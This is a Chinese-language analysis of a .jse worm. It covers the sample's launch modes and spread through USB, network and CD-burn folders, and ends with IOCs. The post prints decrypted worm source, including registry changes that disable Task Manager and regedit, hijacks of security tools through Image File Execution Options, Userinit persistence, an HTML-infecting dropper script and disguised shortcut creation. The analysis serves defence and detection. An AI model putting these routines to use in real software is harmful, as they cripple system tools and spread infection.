一例jse蠕虫的分析

news2024/11/16 19:57:31

概述

这是一例jse格式的蠕虫病毒,会隐藏系统中所有的doc、docx和rtf文件,创建同名的.jse文件,诱导用户点击执行,通过感染U盘和网络驱动器、光盘刻录临时文件夹、html文件进行传播。

这个样本是使用JScript语言编写的加密脚本文件,可以使用cscript.exe来执行,分析起来没有难度,但是其修改注册表的操作的还是很高明的。

样本信息

MD5: 4d1a9f7559de521e1458021a1a7df7cf
SHA1: b7f8913852e17aed219ef544272971bc36e30f38
SHA256: abb9839405654d2f44e85e4e36d6da429513a34322ce5b181807b30c56b96c73

样本使用Jscript脚本编写,并使用加密。

分析过程

使用在线解密工具(JScript.Encode 在线解密 (jb51.net))对脚本进行解密,解密后对脚本进行格式化(Online JavaScript beautifier)。解密后的脚本如下图所示。

下面来分析解密后的脚本内容。

使用vscode打开解密后的脚本文件。(因为vscode支持重命名全局变量和局部变量、转到定义、折叠和展开代码,这些功能对分析脚本类病毒非常友好)

下面的病毒的主函数的逻辑,主要分了好几种启动情形。

if 当前脚本不是.jse结尾,且有参数:
    if 参数1/e:
        (这是运行annie.sys /e的情况)
        执行 cscript.exe //e:jscript annie.sys /r 休眠0.1s
        执行 cscript.exe //e:jscript annie.sys /s 休眠0.1s
        执行 cscript.exe //e:jscript annie.sys /n 休眠0.1s
    elif 参数1/r:
        while(当前文件名为annie.sys):
            在光盘记录刻录区创建  annie.ani和autorun.inf,感染光盘
            修改一堆注册表项,并添加开机启动项
            修改系统.jse文件的显示图标为word的图标
            休眠1s
    elif 参数1/s:
        while(当前文件名为annie.sys):
            遍历系统驱动器,找到可移动存储介质和固定驱动器 Removable=1 Fixed=2
                在驱动器根目录创建自身副本,保存为X:\annie.ini 并隐藏
                创建一个autorun.inf文件并隐藏 用于自启动
                在驱动器的根目录创建beautiful_girl_part_[1-5].lnk文件,图标为windows media player的图标,指向`wscript.exe //e //e:jscript annie.ani /q:[1-5]`
                感染驱动器中所有的将doc、docx、rtf文件隐藏,创建同名副本,在htm、html文件中嵌入一段js脚本,用于传播自身
    elif 参数1/n:
        while(当前文件名为annie.sys):
            遍历系统当前的网络驱动器
                在驱动器根目录写入病毒副本,保存为X:\annie.ini,并隐藏
                在驱动器的根目录创建beautiful_girl_part_[1-5].lnk文件,图标为windows media player的图标,指向`wscript.exe //e //e:jscript annie.ani /q:[1-5]`
                感染驱动器中所有的将doc、docx、rtf文件隐藏,创建同名副本,在htm、html文件中嵌入一段js脚本,用于传播自身
            休眠15分钟
    elif 参数1/t: 
        (这种情况是被感染的html文件释放病毒并启动的情形)
        若C:\windows\system32\drivers\annie.sys不存在 ,创建并启动 annie.sys /e
        执行`cmd /c del /q /f [selfFileName]` 删除自身
    elif 参数1/a:
        (这种情况是autorun.inf启动annie.ini的情形)
        若C:\windows\system32\drivers\annie.sys不存在 ,创建并启动 annie.sys /e
        执行`explorer.exe /e,/select, [selfFileName]` 
    else:
        (这是双击beautiful_girl_part_[1-5].lnk的情形)
        若C:\windows\system32\drivers\annie.sys不存在 ,创建并启动 annie.sys /e
        执行 `wmplayer.exe beautiful_girl_part_[arg['q']].avi"`
else:
	(用户双击伪装成word文档的.jse文件)
    将病毒母体写入到C:\windows\system32\drivers\annie.sys,
    并启动 wscript.exe //e:jscript annie.sys /e
    打开当前目录下同名的doc、docx、rtf文件

注册表行为

这个病毒修改了许多系统注册表项,用于隐藏自己,不被发现。

//修改注册表 添加  开机自启动
function SetReg() {
    //删除右键菜单中打开方式 
    ws_shell.RegDelete('HKCR\\*\\shellex\\ContextMenuHandlers\\Open With\\');
    //将inf文件默认打开方式改变 删除  'cmd.exe /c del /q /f "%1"
    ws_shell.RegWrite('HKCR\\' + ReadRegHKCR('.inf') + '\\shell\\Install\\command\\', 'cmd.exe /c del /q /f "%1"', 'REG_EXPAND_SZ');
    //将jse文件 默认编辑 改为 打开
    ws_shell.RegWrite('HKCR\\' + ReadRegHKCR('.JSE') + '\\Shell\\Edit\\Command\\', ReadRegHKCR(ReadRegHKCR('.JSE') + '\\Shell\\Open\\Command\\'), 'REG_EXPAND_SZ');
    ws_shell.RegDelete('HKCR\\' + ReadRegHKCR('.JSE') + '\\Shell\\Open2\\');  
    ws_shell.RegDelete('HKCR\\' + ReadRegHKCR('.JSE') + '\\Shell\\Open2\\Command\\');
    ws_shell.RegDelete('HKCR\\' + ReadRegHKCR('.JSE') + '\\ShellEx\\PropertySheetHandlers\\WSHProps\\');

    // .reg的默认打开方式改为删除 
    ws_shell.RegWrite('HKCR\\' + ReadRegHKCR('.reg') + '\\shell\\open\\command\\', 'cmd.exe /c del /q /f "%1"', 'REG_EXPAND_SZ');

    //不允许用户更改文件属性
    ws_shell.RegWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFileAssociate', '1', 'REG_DWORD');

    //禁止regedit修改注册表 
    ws_shell.RegWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools', '1', 'REG_DWORD');

    //禁用任务管理器
    ws_shell.RegWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableTaskMgr', '1', 'REG_DWORD');

    //隐藏 组策略
    ws_shell.RegWrite('HKCU\\Software\\Policies\\Microsoft\\MMC\\RestrictToPermittedSnapins', '1', 'REG_DWORD');

    //修改这些程序的执行命令行 attrib.exe autoruns.exe procexp.exe reg.exe RegAlyzer.exe taskkill.exe
    ws_shell.RegWrite('HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\attrib.exe\\Debugger', 'cmd.exe /c rem');
    ws_shell.RegWrite('HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\autoruns.exe\\Debugger', 'cmd.exe /c del /q /f'); 
    ws_shell.RegWrite('HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\procexp.exe\\Debugger', 'cmd.exe /c del /q /f');
    ws_shell.RegWrite('HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\reg.exe\\Debugger', 'cmd.exe /c rem');
    ws_shell.RegWrite('HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\RegAlyzer.exe\\Debugger', 'cmd.exe /c del /q /f');
    ws_shell.RegWrite('HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskkill.exe\\Debugger', 'cmd.exe /c rem');

    //设置开机自启动 wscript.exe //e:jscript annie.sys /e
    ws_shell.RegWrite('HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit', sys_dir + '\\userinit.exe,wscript.exe //e:jscript ' + annie_sys_filename + ' /e');

    //隐藏已知文件扩展名 不能更改
    ws_shell.RegWrite('HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\HideFileExt\\UncheckedValue', '1', 'REG_DWORD');

    //无法显示“隐藏受保护的操作系统文件”
    ws_shell.RegWrite('HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\SuperHidden\\UncheckedValue', '0', 'REG_DWORD');

    //禁用系统还原
    ws_shell.RegWrite('HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\SystemRestore\\DisableConfig', '1', 'REG_DWORD');
    ws_shell.RegWrite('HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\SystemRestore\\DisableSR', '1', 'REG_DWORD');   
}

感染与传播行为

该样本的感染行为有:感染各固定驱动器、移动存储介质、系统临时刻录文件夹、网络驱动器,会隐藏doc、docx、rtf文件,创建同名的.jse文件(为病毒副本,使用word图标),诱导用户点击,感染、htm和html文件,向其中嵌入恶意js代码。

感染驱动器根目录

在所有驱动器的根目录,创建X:\annie.aniX:\autorun.inf两个隐藏文件,其中annie.ani为病毒副本,autorun.inf文件内容如下,用于病毒自启动。

[autorun]
shellexecute=wscript.exe //e:jscript annie.ani /a
shell\open\command=wscript.exe //e:jscript annie.ani /a
shell\explore\command=wscript.exe //e:jscript annie.ani /a

此外还会创建5个lnk文件X:\beautiful_girl_part_[1-5].lnk,指向
C:\Windows\system32\wscript.exe //e:jscript.encode annie.ani /q:[1-5],这些快捷方式的图标为windows Media Player的图标,让用户误以为是视频,当用户点击这几个快捷方式文件,系统会被感染。

创建lnk文件的代码如下

//在驱动器的根目录创建beautiful_girl_part_[1-5].lnk文件,图标为windows media player的图标,指向`wscript.exe //e //e:jscript annie.ani /q:[1-5]`
function CreateLnkFile(rootPath) {
    for (var i = 1; i <= 5; i++) {
        var filename = rootPath + 'beautiful_girl_part_' + i + '.lnk';
        if (!fs_obj.FileExists(filename)) {
            try {
                var lnk = ws_shell.CreateShortcut(filename);
                lnk.IconLocation = 'wmploc.dll,8'; //快捷方式的图标 windows系统播放器的图标 
                lnk.TargetPath = 'wscript.exe'; //wscript.exe //e //e:jscript annie.ani /q:[i]
                lnk.Arguments = '//e:jscript annie.ani ' + '/q:' + i;
                lnk.Save();
            } catch (e) {}
        }
    }
}

隐藏系统内word文件,创建同名jse文件

该病毒会隐藏固定驱动器、可移动存储介质和网络驱动中所有doc、docx、rtf文件,并将自身副本拷贝成同名的.jse文件,并通过修改注册表的方式将.jse文件的默认图标修改为word图标,这样用户若看不到后缀名的情况下会误以为.jse文件为word文档。
修改.jse文件图标的代码如下

function ChangeICO(extension) {
    //修改jse文件的图标 为doc文件的图标 
    ws_shell.RegWrite('HKCR\\' + ReadRegHKCR('.JSE') + '\\', ReadRegHKCR(ReadRegHKCR(extension) + '\\'));
    ws_shell.RegWrite('HKCR\\' + ReadRegHKCR('.JSE') + '\\DefaultIcon\\', ReadRegHKCR(ReadRegHKCR(extension) + '\\DefaultIcon\\'));
    ws_shell.RegWrite('HKCR\\' + ReadRegHKCR('.JSE') + '\\FriendlyTypeName', ReadRegHKCR(ReadRegHKCR(extension) + '\\'), 'REG_EXPAND_SZ');
}


//修改jse文件的图标为docx文件的图标 
function ChangeJseIco() {
    try {
        ChangeICO('.docx');
    } catch (e) {
        try {
            ChangeICO('.doc');
        } catch (e) {
            try {
                ChangeICO('.rtf');
            } catch (e) {}
        }
    }
}

感染htm和html文件

感染htm、html文件的代码如下:

//感染 html文件
function infect_html(htm_filename) {
    var niaxw = '<!--[ANNIE83E333BF08546819]-->';
    if (ReadFirstLine(htm_filename) != niaxw) { //若第1行不是 <!--[ANNIE83E333BF08546819]-->
        var html_txt = ReadTxtFile(htm_filename);
        var ki4io = SelfFileText.replace(/\\/g, '\\\\');//转义
        var v0l9m = ki4io.replace(/\'/g, '\\\'');//转义
        var p7r2q = '<html>\n<script type="text/javascript">\n<!--\nvar ayfp6=new ActiveXObject(\'Scripting.FileSystemObject\');var dk5h8=new ActiveXObject(\'WScript.Shell\');var s41k8=ayfp6.GetSpecialFolder(2);var bgw3u=ayfp6.GetTempName();var vlx8c=\'' + v0l9m + '\'+String.fromCharCode(0);var rwyg5=ayfp6.CreateTextFile(s41k8+\'\\\\\'+bgw3u,true);rwyg5.Write(vlx8c);rwyg5.Close();dk5h8.Run(\'wscript.exe //e:jscript \'+s41k8+\'\\\\\'+bgw3u+\' /t\');\n//-->\n</script>\n</html>';
        SetFileAttr(htm_filename, 0);
        try {
            var k4y0d = fs_obj.OpenTextFile(htm_filename, 2);
            k4y0d.WriteLine(niaxw);
            k4y0d.WriteLine(html_txt);
            k4y0d.WriteLine(p7r2q);
            k4y0d.Close();
        } catch (e) {}
    }
}

感染后的html文件如下图。

如上图所示,该病毒会在htm、html文件开头添加一行,内容为<!--[ANNIE83E333BF08546819]-->,作为感染的标记,在文件末尾添加一段js代码。
js代码的功能是将病毒母体保存到临时目录下,执行wscript.exe //e:jscript.encode virus_filename /t,执行感染操作后,删除这个临时文件,不过这段代码在现在的浏览器中好像无法执行。

<html>
<script type="text/javascript">
< !--
  var ayfp6 = new ActiveXObject('Scripting.FileSystemObject'); 
  var dk5h8 = new ActiveXObject('WScript.Shell'); 
  var s41k8 = ayfp6.GetSpecialFolder(2); 
  var bgw3u = ayfp6.GetTempName(); 
  var vlx8c = 'jse文件内容' + String.fromCharCode(0); 
  var rwyg5 = ayfp6.CreateTextFile(s41k8 + '\\' + bgw3u, true); 
  rwyg5.Write(vlx8c); 
  rwyg5.Close(); 
  dk5h8.Run('wscript.exe //e:jscript.encode ' + s41k8 + '\\' + bgw3u + ' /t');
//-->
</script>

</html>

感染光盘刻录临时文件夹

会在C:\Users\[UserName]\AppData\Local\Microsoft\Windows\Burn\Burn\目录下创建两个隐藏文件:annie.ani(病毒副本)和autorun.inf(自启动文件)。代码如下:

//在光盘记录刻录区创建两个隐藏文件  annie.ani和autorun.inf
function InfectCDBurningDir() {
    try {
        var e9hgn = ws_shell.RegRead('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\CD Burning');
        WriteSelf(e9hgn + '\\annie.ani');
        CreateInfFile(e9hgn + '\\autorun.inf');
    } catch (e) {}
}

IOC

hash 
MD5: 4d1a9f7559de521e1458021a1a7df7cf
SHA1: b7f8913852e17aed219ef544272971bc36e30f38
SHA256: abb9839405654d2f44e85e4e36d6da429513a34322ce5b181807b30c56b96c73


文件
C:\windows\system32\drivers\annie.sys 文件大小为9201字节
X:\annie.ini 
X:\autorun.inf 174字节
C:\Users\[UserName]\AppData\Local\Microsoft\Windows\Burn\Burn\annie.ini
C:\Users\[UserName]\AppData\Local\Microsoft\Windows\Burn\Burn\autorun.inf

X:\beautiful_girl_part_[1-5].lnk 图标为windows Media Player的图标
.doc .docx .rtf文件变成同名的.jse文件,使用为word图标
.htm .html文件的第一行变成<!--[ANNIE83E333BF08546819]-->



注册表
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\JSEFile\Shell\Edit\Command=C:\Windows\System32\WScript.exe "%1" %*
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFileAssociate=1
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools=1
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableTaskMgr=1
HKCU\\Software\\Policies\\Microsoft\\MMC\\RestrictToPermittedSnapins=1
HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\attrib.exe\\Debugger=cmd.exe /c rem
HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\autoruns.exe\\Debugger=cmd.exe /c del /q /f
HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\procexp.exe\\Debugger=cmd.exe /c del /q /f
HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\reg.exe\\Debugger=cmd.exe /c rem
HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\RegAlyzer.exe\\Debugger=cmd.exe /c del /q /f
HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskkill.exe\\Debugger=cmd.exe /c rem
HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit=C:\windows\system32\userinit.exe,wscript.exe //e:jscript C:\windows\system32\driver/annie.sys /e
HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\HideFileExt\\UncheckedValue=1
HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\SuperHidden\\UncheckedValue=0
HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\SystemRestore\\DisableConfig=1
HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\SystemRestore\\DisableSR=1
太多了没列完可以参考上文

系统中这些进程无法使用 
attrib.exe autoruns.exe procexp.exe reg.exe RegAlyzer.exe taskkill.exe regedit

总结

这个jse病毒分析起来相对容易,解密之后,功能很容易分析清楚,但是清理起来并不容易,它隐藏了所有的word文件,且修改了系统很多重要的注册表项,禁用了attrib.exe autoruns.exe procexp.exe reg.exe RegAlyzer.exe taskkill.exe regedit,禁用了系统还原等系统设置,通过感染可移动存储介质、网络驱动器和html文件进行传播,比较奇怪的是没有网络行为。

参考资料

  • JScript 用户指南 - [ JavaScript参考手册 ] - 在线原生手册 - php中文网

  • 求助 电脑中了jse蠕虫病毒,word全变格式了,怎么办? - 『病毒救援区』 - 吾爱破解 - LCG - LSG |安卓破解|病毒分析|www.52pojie.cn

  • JScript.Encode 在线解密 (jb51.net)

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1118976.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

全网最丑焊锡教程(仅排针焊接心得)

一直以来玩各种开发板&#xff0c;焊接水平太差始终是阻碍我买性价比高的板子的最大原因。淘宝上好多芯片搭载上肥猪流板子是不包排针焊接的。终于下定决心要克服这个困难。不过&#xff0c;只是会焊接排针在高手面前最好不要说自己会焊锡&#xff0c;这应该是两码事。 首先上…

智慧矿山矿山安全生产:皮带撕裂识别AI算法不用激光,能迅速识别皮带纵撕!

近些年来&#xff0c;智慧矿山在煤矿行业中发挥着越来越重要的作用。皮带的功能对于矿山运营至关重要&#xff0c;而皮带撕裂是造成生产中断、人身伤害等问题的重要原因之一。为了准确、及时地检测皮带撕裂的情况&#xff0c;AI算法的应用成为智慧矿山的关键。 ​​​​​​​…

Leetcode—2530.执行K次操作后的最大分数【中等】(C语言向上取整数学公式)

2023每日刷题&#xff08;五&#xff09; Leetcode—2530.执行K次操作后的最大分数 向上取整思想 参考了这篇文章 有人肯定会问&#xff0c;这个向上取整为什么是这样来的。接下来我简单讲解一下。 数学式&#xff1a; x y 数学式&#xff1a;\frac{x}{y} 数学式&#xff1a…

【Java 进阶篇】深入了解 Bootstrap 组件

Bootstrap 是一个流行的前端框架&#xff0c;提供了丰富的组件&#xff0c;用于创建各种网页元素和交互效果。这些组件可以帮助开发者轻松构建漂亮、响应式的网页&#xff0c;而无需深入的前端开发知识。在本文中&#xff0c;我们将深入探讨 Bootstrap 中一些常用的组件&#x…

【Django 04】Serialization 序列化的高级使用

序列化器 serializers 序列化器的作用 序列化将 queryset 和 instance 转换为 json/xml/yaml 返回给前端 反序列化与序列化则相反 定义序列化器 定义类&#xff0c;继承自 Serializer 通常新建一个 serializers.py 文件 撰写序列化内容 suah as 目前只支持 read_only 只…

软件报错msvcr120.dll丢失怎么办?五个有效修复方法分享

msvcr120.dll是一个动态链接库文件&#xff0c;它是Microsoft Visual C 2012 Redistributable Package的一部分。如果你的电脑在运行一些需要这个文件的程序时出现了“msvcr120.dll丢失”的错误&#xff0c;那么就意味着你的电脑缺少了这个文件&#xff0c;或者这个文件已经损坏…

使用 类加载器 或者 类对象 读取文件

相对路径&#xff1a;项目 的 根目录 开始查找。&#xff08; 但是在我们真正开发的时候&#xff0c;我们读到的更多的文件并不是直接放在我们项目里面这个文件夹里面&#xff0c;而是放在我们模块里面 &#xff09;同理可得&#xff0c;我们直接创建 文件 b.txt 会在项目的根目…

Python---死循环概念---while True

在编程中一个靠自身控制无法终止的程序称为“死循环”。 在Python中&#xff0c;我们也可以使用while True来模拟死循环&#xff1a; 代码&#xff1a; while True: print(每天进步一点点) 图示 应用&#xff1a; 比如&#xff0c;在测试里面&#xff0c;自动化测试用例…

多模态笔记

Transformer 对文本输入进行tokenizer时&#xff0c;调用的接口batch_encode_plus&#xff0c;过程大致是这样的(参考&#xff1a;tokenizer用法) #这里以bert模型为例&#xff0c;使用上述提到的函数 from transformers import BertTokenizer tokenizer BertTokenizer.from…

【JavaEE】JUC 常见的类 -- 多线程篇(8)

JUC 常见的类 1. Callable 接口2. ReentrantLock3. 原子类4. 线程池5. 信号量 Semaphore6. CountDownLatch 1. Callable 接口 Callable Interface 也是一种创建线程的方式 Runnable 能表示一个任务 (run方法) – 返回 voidCallable 也能表示一个任务(call方法) 返回一个具体的…

【C++学习笔记】内联函数

1. 概念 以inline修饰的函数叫做内联函数&#xff0c;编译时C编译器会在调用内联函数的地方展开&#xff0c;没有函数调 用建立栈帧的开销&#xff0c;内联函数提升程序运行的效率。 如果在上述函数前增加inline关键字将其改成内联函数&#xff0c;在编译期间编译器会用函数…

思维模型 上瘾模型(hook model)

本系列文章 主要是 分享 思维模型&#xff0c;涉及各个领域&#xff0c;重在提升认知。你到底是怎么上瘾&#xff08;游戏/抖音&#xff09;的&#xff1f;我们该如何“积极的上瘾”&#xff1f;让我们来一切揭晓这背后的秘密。 1 上瘾模型的应用 1.1上瘾模型的积极应用 1 学…

【LCR 170. 交易逆序对的总数】

目录 一、题目描述二、算法原理三、代码实现3.1升序&#xff1a;3.2降序&#xff1a; 一、题目描述 二、算法原理 三、代码实现 3.1升序&#xff1a; class Solution { public:int mergeSort(vector<int>& nums, int left, int right){if (left > right){retur…

Vue基础语法2事件修饰符按键修饰符常用控件自定义指令全局样式绑定

目录 1.样式绑定 2. 事件修饰符 3. 按键修饰符 4. 常用控件 4.1 常用控件示例 4.2 修饰符 5. 自定义指令 5.1 局部 5.2 全局 1.样式绑定 class绑定 使用方式&#xff1a;v-bind:&#xff0c;expression的类型&#xff1a;字符串、数组、对象style绑定 v-bind:style&q…

从输入URL到展示出页面

目录 了解URL 1. 输入URL 2. 域名解析 3. 建立连接 4. 服务器处理请求&#xff1a; 5. 返回响应&#xff1a; 6. 浏览器解析HTML&#xff1a; 7. 加载资源&#xff1a; 8. 渲染页面&#xff1a; 9. 执行JavaScript&#xff1a; 10. 页面展示&#xff1a; 从输入URL到…

运维学习CentOS 7进行Nightingale二进制部署

.因为Nightingale需要MySQL保存一些数据&#xff0c;所以可以参考《CentOS 7.6使用mysql-8.0.31-1.el7.x86_64.rpm-bundle.tar安装Mysql 8.0》部署MySQL。 https://github.com/ccfos/nightingale/releases是可以github上下载Nightingale二进制安装包。 https://n9e.github.io/…

【COMP305 LEC 3 LEC 4】

LEC 3 A basic abstract model for a biological neuron 1. Weights of connections Neuron gets fired if it has received from the presynaptic neurons 突触前神经元 a summary impulse 脉冲, which is above a certain threshold. Signal from a single synapse突触 ma…

实时消息传送:WebSocket实现系统后台消息实时通知

实时消息传送&#xff1a;WebSocket实现系统后台消息实时通知 WebSocket简介基本实现步骤后台服务器后端接口SimpMessagingTemplate MessageDto前端客户端 示例应用 在现代Web应用中&#xff0c;提供实时通知对于改善用户体验至关重要。WebSocket技术允许建立双向通信通道&…

08-React扩展

08-React扩展 1. setState的2种写法 案例&#xff1a; export default class Demo extends Component {state {count: 0}add () > {// 获取当前的值const { count } this.state// 更新状态this.setState({ count: count 1 })console.log(count);}render() {const { coun…

WSL2的安装与配置(创建Anaconda虚拟环境、更新软件包、安装PyTorch、VSCode)

1. WSL2 安装 以管理员身份打开 PowerShell&#xff08;“开始”菜单 >“PowerShell” >单击右键 >“以管理员身份运行”&#xff09;&#xff0c;然后输入以下命令&#xff1a; dism.exe /online /enable-feature /featurename:Microsoft-Windows-Subsystem-Linux /a…